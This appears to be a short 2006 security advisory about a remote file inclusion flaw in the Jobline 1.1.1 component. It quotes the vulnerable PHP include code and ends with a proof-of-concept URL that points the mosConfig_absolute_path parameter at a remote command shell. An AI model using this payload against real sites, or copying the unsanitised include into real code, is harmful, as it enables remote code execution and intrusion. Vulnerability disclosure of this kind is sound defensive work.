Jobline 1 1 1 Version - Remote File Include Vulnerability

2006-06-15T00:00:00
ID SECURITYVULNS:DOC:13167
Type securityvulns
Reporter Securityvulns
Modified 2006-06-15T00:00:00

Description

SaVSaK.CoM | SpC-x - The_BeKiR |

Jobline 1 1 1 Version - Remote File Include Vulnerability

Risk : High

Class: Remote

Script : Jobline

Credits : SpC-x

Thanks : The_BeKiR - Ejder - FasTBoY - ERNE - RMx

Code :

if ( file_exists( "$mosConfig_absolute_path/components/$option/language/$mosConfig_lang.php" ) ) {

include_once("$mosConfig_absolute_path/components/$option/language/$mosConfig_lang.php");

} else {

include_once("$mosConfig_absolute_path/components/$option/language/english.php");

}

Vulnerable :

http://www.victim.com/Jobline/admin.jobline.php?mosConfig_absolute_path=Command-Shell